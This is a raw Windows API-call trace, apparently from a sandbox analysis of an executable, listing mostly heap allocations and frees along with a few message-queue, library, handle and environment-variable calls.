RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0266.341] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.341] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.341] FreeLibrary (hLibModule=0x756e0000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.341] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.341] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.342] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.342] CloseHandle (hObject=0x2d0) returned 1 [0266.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0266.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0266.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0266.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.345] CloseHandle (hObject=0x2a0) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0266.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.352] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0266.352] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0266.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 